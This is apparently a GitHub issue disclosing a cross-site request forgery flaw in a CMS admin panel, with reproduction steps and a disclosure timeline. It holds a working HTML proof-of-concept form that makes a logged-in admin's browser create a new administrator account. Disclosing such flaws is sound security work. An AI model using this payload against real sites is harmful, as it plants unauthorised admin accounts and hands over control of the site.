CSRF issue that allows attacker to create an account #187
Description
Hello. I'd like to report a security issue on the admin page.
Summary
this vuln is CSRF vuln that allows creating any kinds of account.
When an attacker induces authorized victims to a malicious webpage and make them send requests. a victim creates an account without their intent.
Reproduce
This is a step how to reproduce.
- Access to the html page contains the payload after you login to admin(/en_US/admin/) page.
Then you find an admin account named [test] is created.
Payloads
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="http://your.cms.domain.example.com/en_US/admin/user/manage/add" method="POST">
<input type="hidden" name="_method" value="POST" />
<input type="hidden" name="name" value="test" />
<input type="hidden" name="username" value="test" />
<input type="hidden" name="email" value="test@example.com" />
<input type="hidden" name="web" value="" />
<input type="hidden" name="locale" value="" />
<input type="hidden" name="status" value="0" />
<input type="hidden" name="status" value="1" />
<input type="hidden" name="password" value="testtest" />
<input type="hidden" name="password2" value="testtest" />
<input type="hidden" name="roles[_ids]" value="" />
<input type="hidden" name="roles[_ids][]" value="1" />
<input type="hidden" name="welcome_message" value="0" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>
I think this security issue is not serious. Because attack using this vulnerability requires induction.
Event
- 2018-03-15 this vulnerability is discovered.
- 2018-03-27 Open an issue on Github.